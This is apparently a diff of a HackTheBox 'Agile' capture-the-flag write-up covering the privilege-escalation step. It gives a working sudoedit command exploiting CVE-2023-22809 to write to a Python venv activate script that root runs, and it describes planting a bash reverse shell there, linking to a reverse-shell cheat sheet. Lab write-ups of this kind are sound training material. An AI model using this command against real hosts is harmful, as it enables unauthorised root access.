HackTheBox "Agile"

 edwards@agile:~$

-is vulnerable to CVE-2023-22809.
-To use this CVE, we need a file that dev_admin
+Our version of `sudo` is before 1.9.12p2, which means `sudoedit` is vulnerable to CVE-2023-22809.
+To use this CVE, we need a file that `dev_admin` can write to and `root` can run.

-A vulnerable file is /app/venv/bin/activate
+A vulnerable file is `/app/venv/bin/activate`.
+Using the command:

 EDITOR="vim -- /app/venv/bin/activate" sudo -u dev_admin sudoedit /app/config_test.json

-.
-Now we can put a reverse shell in here, specifically a bash shell from the cheat sheet.
+We can write to `/app/venv/bin/activate`.
+Now we can put a reverse shell in here, specifically a bash shell from the [cheat sheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp).

 # This file must be used with "source bin/activate" *from bash*